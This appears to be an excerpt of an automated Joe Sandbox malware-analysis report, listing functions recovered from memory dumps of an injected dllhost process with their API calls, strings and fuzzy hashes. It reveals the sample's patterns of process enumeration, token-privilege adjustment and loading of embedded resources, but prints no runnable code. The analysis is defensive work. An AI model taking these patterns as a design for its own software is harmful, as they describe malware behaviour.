                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$AllocFree$CloseEnumHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1094675910-0
                                                                                                    • Opcode ID: 40ac5f9af0dc405098d955ccb8048c094732bdb2d7ea0c596abb39cc2310a86b
                                                                                                    • Instruction ID: 4b59238bf1178fd801cf3aa64f00fec842e337ceda7025f76571f25d4c0e4c48
                                                                                                    • Opcode Fuzzy Hash: 40ac5f9af0dc405098d955ccb8048c094732bdb2d7ea0c596abb39cc2310a86b
                                                                                                    • Instruction Fuzzy Hash: 24214AB2A05A4186EB5BDF67B8043E967A5EBCDBD4F188028EF0903765EE39C5458700

                                                                                                    Control-flow Graph

                                                                                                    Control-flow graph of function at 140002cc0 (calls: GetProcessHeap, HeapAlloc, K32EnumProcesses, Sleep, SleepEx; subcalls 1400018b8, 1400026c8)
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3676546796-0
                                                                                                    • Opcode ID: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
                                                                                                    • Instruction ID: f5c9d4a5b69028f7e675e4f55ad24f1fde79fbf253f2587fb23ff6ba6251f188
                                                                                                    • Opcode Fuzzy Hash: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
                                                                                                    • Instruction Fuzzy Hash: 00216DB26046119BE72ADB17F4547AAB765F78ABC0F148029EF4607B74DF39D844CB40

                                                                                                    Control-flow Graph

                                                                                                    Control-flow graph of function at 1400019ac (calls: OpenProcess, IsWow64Process, CloseHandle)
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseHandleOpenWow64
                                                                                                    • String ID:
                                                                                                    • API String ID: 10462204-0
                                                                                                    • Opcode ID: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
                                                                                                    • Instruction ID: b8256ea2c68c538602416b6aa3eb21c3f9e346f5a399754842a841befddfe838
                                                                                                    • Opcode Fuzzy Hash: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
                                                                                                    • Instruction Fuzzy Hash: 21F01D7170578182EB56CF17B5943996661F78DBC0F449039EB8943768DF39C445C700

                                                                                                    Control-flow Graph

                                                                                                    Control-flow graph of function at 2131118d97c (calls: GetStdHandle, GetFileType)
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileHandleType
                                                                                                    • String ID:
                                                                                                    • API String ID: 3000768030-0
                                                                                                    • Opcode ID: 1967b40dd57b97bb525af26d6ad1805b1ec8d849c8768615d24505621a206a62
                                                                                                    • Instruction ID: 89c283e8f4649deb2e5a5b1c6d71c0f017a251de7302ebf8ee092477a19adb51
                                                                                                    • Opcode Fuzzy Hash: 1967b40dd57b97bb525af26d6ad1805b1ec8d849c8768615d24505621a206a62
                                                                                                    • Instruction Fuzzy Hash: 50319232614B54A1EF64CB3584982ECB762F355BB0FA45329DB6E073E0CB79D691D340

                                                                                                    Control-flow Graph

                                                                                                    Control-flow graph of function at 140002314 (calls: ExitProcess; subcall 140002328)
                                                                                                    APIs
                                                                                                      • Part of subcall function 0000000140002328: VerSetConditionMask.NTDLL ref: 0000000140002397
                                                                                                      • Part of subcall function 0000000140002328: VerSetConditionMask.NTDLL ref: 00000001400023A8
                                                                                                      • Part of subcall function 0000000140002328: VerSetConditionMask.NTDLL ref: 00000001400023B9
                                                                                                      • Part of subcall function 0000000140002328: VerifyVersionInfoW.KERNEL32 ref: 00000001400023CC
                                                                                                      • Part of subcall function 0000000140002328: GetCurrentProcessId.KERNEL32 ref: 00000001400023DE
                                                                                                      • Part of subcall function 0000000140002328: OpenProcess.KERNEL32 ref: 00000001400023EE
                                                                                                      • Part of subcall function 0000000140002328: OpenProcessToken.ADVAPI32 ref: 000000014000240F
                                                                                                      • Part of subcall function 0000000140002328: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002429
                                                                                                      • Part of subcall function 0000000140002328: AdjustTokenPrivileges.ADVAPI32 ref: 000000014000246D
                                                                                                      • Part of subcall function 0000000140002328: GetLastError.KERNEL32 ref: 0000000140002477
                                                                                                      • Part of subcall function 0000000140002328: CloseHandle.KERNEL32 ref: 0000000140002480
                                                                                                      • Part of subcall function 0000000140002328: FindResourceA.KERNEL32 ref: 0000000140002494
                                                                                                      • Part of subcall function 0000000140002328: SizeofResource.KERNEL32 ref: 00000001400024AB
                                                                                                      • Part of subcall function 0000000140002328: LoadResource.KERNEL32 ref: 00000001400024C4
                                                                                                      • Part of subcall function 0000000140002328: LockResource.KERNEL32 ref: 00000001400024D6
                                                                                                      • Part of subcall function 0000000140002328: GetCurrentProcessId.KERNEL32 ref: 00000001400024E3
                                                                                                    • ExitProcess.KERNEL32 ref: 000000014000231F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
Similarity
• API ID: Process$Resource$ConditionMask$CurrentOpenToken$AdjustCloseErrorExitFindHandleInfoLastLoadLockLookupPrivilegePrivilegesSizeofValueVerifyVersion
• String ID:
• API String ID: 2329183550-0
• Opcode ID: b0a0a4fa82025a7106bcbc5f0283a7e56e2f2d2b49c7278ed3f20df004582f7f
• Instruction ID: 7c7aea37a3e583da0aeb422a26f6f3708a563d165f4d83b605441c4e5f6a8964
• Opcode Fuzzy Hash: b0a0a4fa82025a7106bcbc5f0283a7e56e2f2d2b49c7278ed3f20df004582f7f
• Instruction Fuzzy Hash: C1B01274A0014881D51FB3F234453CC0224974C341F400C0463010B961CE3C10180312

APIs
Strings
Memory Dump Source
• Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
Similarity
• API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
• API String ID: 2119608203-3850299575
• Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
• Instruction ID: 1cd8e1a74313cd295a5784af730c23531421da4fb6d0bcf164b0c1445b91a088
• Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
• Instruction Fuzzy Hash: D2B1C272220A90A2EB65CF35D4487E9E3A6F764B84F549036EE4E537A4DFB9CE41C340

APIs
Memory Dump Source
• Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
• Instruction ID: 5e7a04dd01bb4e0dd15b825503e0fdcaccaee7e7a508084ec04fcac6aaf31d7f
• Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
• Instruction Fuzzy Hash: 87316036214F80A6DB60CF35E8843DEB3A5F798758F544126EA9E43BA4DF78C655CB00

APIs
Strings
Memory Dump Source
• Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: dialer
• API String ID: 756756679-3528709123
• Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
• Instruction ID: 93c3863519c2ee1aa0e3952ffe7e8753f4b4403fc8936b857966d4e6e3197dbb
• Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
• Instruction Fuzzy Hash: 37319531715B55A2EB15DF36A8482E9E3B2FB64B84F088534DE4D07B64EB7CC6618700

APIs
Strings
Memory Dump Source
• Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
• Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
• Instruction ID: 5612058e4c0c9761274b8fca2d33ccd3ae5ac4fcba43fd61934b127f7af3fc51
• Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
• Instruction Fuzzy Hash: F2519A32615608AAEB54CB35E44CBD9B397F3A4BA8F50C134DA1E47788FBB9CA41C700

APIs
Strings
Memory Dump Source
• Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
• Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
• Instruction ID: faa2c38257057e3429eba7770ba323e7a5bfe42f2bb76d273cd78d02ebb0895b
• Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
• Instruction Fuzzy Hash: 16316732214648A6E714DB31E84C7D9B7A7F7A4B98F058128EE5A07785EB78CA40C704

APIs
Strings
Memory Dump Source
• Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
• Instruction ID: 9c940cf398a5781526f64b4d3b04d50c5733dc3a69371852f0c5da584cfc5a96
• Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
• Instruction Fuzzy Hash: B2F01271325648B2FF54CB71F88C3E5A762AB68BD0F486039D52F45A64DF6CC698C700

APIs
Memory Dump Source
• Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
• Instruction ID: 478c71a678fe9999deeb88b6d8a0325ca266820e851439dbc3493ec070345fcd
• Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
• Instruction Fuzzy Hash: A402CB32219B8496EBA0CB65F49439EF7A2F3D4794F504125EA8E87B68DFBCC554CB00

APIs
Strings
Memory Dump Source
• Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
• Instruction ID: 3734d04ef3e80a077c70b26b7c3e57fb893fd27910afd06e8f1a9b3db36ebfb4
• Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
• Instruction Fuzzy Hash: 1F51F732618781A3E636DE39A15C3EAE753F3A5784F248135DD8E03B99DA7DC601CB40

APIs
Memory Dump Source
• Source File: 0000002A.00000002.2957532172.0000021311180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021311180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_21311180000_dllhost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
• Instruction ID: 69aa7cd462674eaa8afe67f322bac80a6aad927e7f9cb34c978fab9dc4cf1c78
• Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
• Instruction Fuzzy Hash: D2218133605B9496EB12CF79E4082DAF3A1FB98B94F058131EE8D47B64EE7CC6428700